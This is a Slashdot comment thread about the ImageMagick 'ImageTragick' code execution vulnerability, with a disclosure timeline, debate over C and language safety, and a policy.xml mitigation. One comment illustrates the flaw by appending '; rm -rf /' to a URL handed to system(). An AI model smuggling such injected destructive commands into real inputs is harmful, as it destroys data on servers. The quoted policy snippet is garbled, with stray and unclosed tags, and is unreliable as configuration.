Slashdot Mirror
Huge Number Of Sites Imperiled By Critical Image-Processing Vulnerability (arstechnica.com)
Dan Goodin, reporting for Ars Technica: A large number of websites are vulnerable to a simple attack that allows hackers to execute malicious code hidden inside booby-trapped images. The vulnerability resides in ImageMagick, a widely used image-processing library that's supported by PHP, Ruby, NodeJS, Python, and about a dozen other languages. Many social media and blogging sites, as well as a large number of content management systems, directly or indirectly rely on ImageMagick-based processing so they can resize images uploaded by end users. According to developer and security researcher Ryan Huber, ImageMagick suffers from a vulnerability that allows malformed images to force a Web server to execute code of an attacker's choosing. Websites that use ImageMagick and allow users to upload images are at risk of attacks that could completely compromise their security. "The exploit is trivial, so we expect it to be available within hours of this post," Huber wrote in a blog post. He went on to say: "We have collectively determined that these vulnerabilities are available to individuals other than the person(s) who discovered them. An unknowable number of people having access to these vulnerabilities makes this a critical issue for everyone using this software."
Again, why are we still TODAY writing critical core libraries in what is probably the lease secure language next to raw assembly? Go, Java, even Python would be much better alternatives.
Right, cuz Oracle isn't pumping out a security fix for java every other week.
-- Thou hast strayed far from the path of the Avatar.
Because keeping exploits secret leads to an ostrich mentality. Companies often prefer to shoot the messenger rather than solve the problem.
It's not really the language, it's the coding.
Like in human language, it's possible to say something grammatically incorrect in any language.
Take your time.
Shit! The internet is Nightmare on Elm Street. I'm too scared to leave Slashdot and go out and read the article.
“He’s not deformed, he’s just drunk!”
Why are they much better alternatives?
The software written in (*) has no vulnerabilities?
Choosing a language does not really address security, because that choosing will affect how the programmer thinks about security and possibly the less experienced programmers will slack on "programming for safety" paradigm .. because the language does everything for the programmer.
For example:
Please have a look at fefe's gatling[1], an incredible fast http-server, with only very few security problems in the past - written entierly in "C". Also the funny thing is that certain of these highlevel languages will use bindings to these older libraries written in C.
So you will be bitten again.
From all information I overlook I can say, yes in "C" it is incredible easy to make simple errors with hugh consequences - choosing types for example. However "C"-programming can be made more secure with a strict application of certain rules especially on "forbidden" & dangerous constructions. The missconception why "C" is deemed as an insecure language is that much of the code in use stems from the "ancient" times, when such code was mostly not exposed to the raw unforgiving "force" of the internet.
Also there was not such a "zoo" for other different programming languages, so much of the software was implemented using "C". This effect is similar to todays "I use java now, I don't need to take care of security".
The different incarnations of "C" standards also play their part, similar to the "Perl-Mageddon" if you do not have a concise standard about how a programming language will be "interpreted" or "translated" you are deemed to introduce errors. Imagemagik is bloated & ancient, two aspects that are problematic. Fefe adheres to his own standards, that bloat and complexity are the real threats for security. (dietlibc vs. libc). And he is often correct on this topic.
[1] http://www.fefe.de/
Suggestion: read the article and details, before making assumptions. Because if you did, you would have see that that was done. A patch was created but apparently not complete. They also include two mitigation 'patches' (config) in the disclosure. Considering the seriousness of this exploit (even I could understand it - which makes it beyond trivial) the more attention this gets, the better.
From https://imagetragick.com/
April, 21 2016 - file read vulnerability report for one of My.Com services from https://hackerone.com/stewie received by Mail.Ru Security Team. Issue is reportedly known to ImageMagic team.
April, 21 2016 - file read vulnerability patched by My.Com development team
April, 28 2016 - code execution vulnerability in ImageMagick was found by Nikolay Ermishkin from Mail.Ru Security Team while researching original report
April, 30 2016 - code execution vulnerability reported to ImageMagick development team
April, 30 2016 - code execution vulnerability fixed by ImageMagick (incomplete fix)
April, 30 2016 - fixed ImageMagic version 6.9.3-9 published (incomplete fix)
May, 1 2016 - ImageMagic informed of the fix bypass
May, 2 2016 - limited disclosure to 'distros' mailing list
May, 3 2016 - public disclosure at https://imagetragick.com/
Err, why is an image processing library doing network uploads anyway?
Reading comprehension, where are you?
The image processing library does just that, process images. In some cases, it processes images that have been uploaded by users to a web site (think Facebook photo albums), and if the user maliciously uploaded a booby-trapped photo, he can now make the website execute commands that were not intended by the site operator...
Suggestion: read the article and details, before making assumptions.
This is Slashdot. You must be new around here.
What sort of newbie are you? He's AC .. I have seen him posting here for over a decade. He was one of the very first people to sign up for an account.
I am Slashdot. Are you Slashdot as well?
This bug has nothing to do with the language it's written in. It's a simple matter of failing to properly escape special characters when switching contexts (filename -> executable command). You can mess that up in any language.
What sort of newbie are you? He's AC .. I have seen him posting here for over a decade.
Over a decade ago most comments were posted under individual accounts and only goatse trolls posted under AC.
So cut the guy some slack .. he's obviously cleaned up his life.
I am Slashdot. Are you Slashdot as well?
I'd blame the OS instead. Giving each process full access to the system just isn't a good way to do things and constantly leads to problems like this. Python can stop some those problems, but it provides by no means a secure sandbox. If you access the filesystem in Python, you still have full access to the filesystem. In cases such as this the process should be limited to exactly the data it needs to get the job done, meaning an input image, an output location and a bunch of configuration parameter.
The headline says this is an image processing vulnerability. That makes it sound like someone could put embed code into a PNG/JPG/SVG file or something like that. But skimming the linked articles, it looks more like ImageMagick has a server product with bad URL parsing.
Update your /etc/ImageMagick/policy.xml file so that it contains this (taken from http://imagetragick.com ) and restart corresponding daemons:
/> /> /> /> /> /> /> /> />
<policymap>
<policy domain="coder" rights="none" pattern="EPHEMERAL"
<policy domain="coder" rights="none" pattern="URL"
<policy domain="coder" rights="none" pattern="HTTPS"
<policy domain="coder" rights="none" pattern="MVG"
<policy domain="coder" rights="none" pattern="MSL"
<policy domain="coder" rights="none" pattern="TEXT"
<policy domain="coder" rights="none" pattern="SHOW"
<policy domain="coder" rights="none" pattern="WIN"
<policy domain="coder" rights="none" pattern="PLT"
</policymap>
You're safe now. The full fix is still being worked out.
What, in your opinion should the upload receiving routines check? In the example, the website would resize profile photos that users upload. One image format would have the possibly to "include" contents that is to be downloaded from someplace else. Imagemagick performs such downloads by handing off that task to wget (or similar tool), which it calls via system(), completely forgetting to santize the URL (... so somebody might append "; rm -rf / to it, or somesuch). How do you propose that the upload routine of the web site catch this, short of parsing the entire image itself? But if it did that, there'd be no point of using an image processing tool at all, because the wrapper would already half done two thirds of the job.
Strictly speaking, those two aren't equivalent. The C example is using dynamic memory with runtime sizing, while the C++ one is using static sizing (and that array would be allocated on the stack). std::vector p would be the C equivalent. Other than that, I agree with you. Pretty much the only reason to use C these days is if your platform doesn't have a good C++ compiler.
Turns out we should have been using the better fork since 2002 anyway.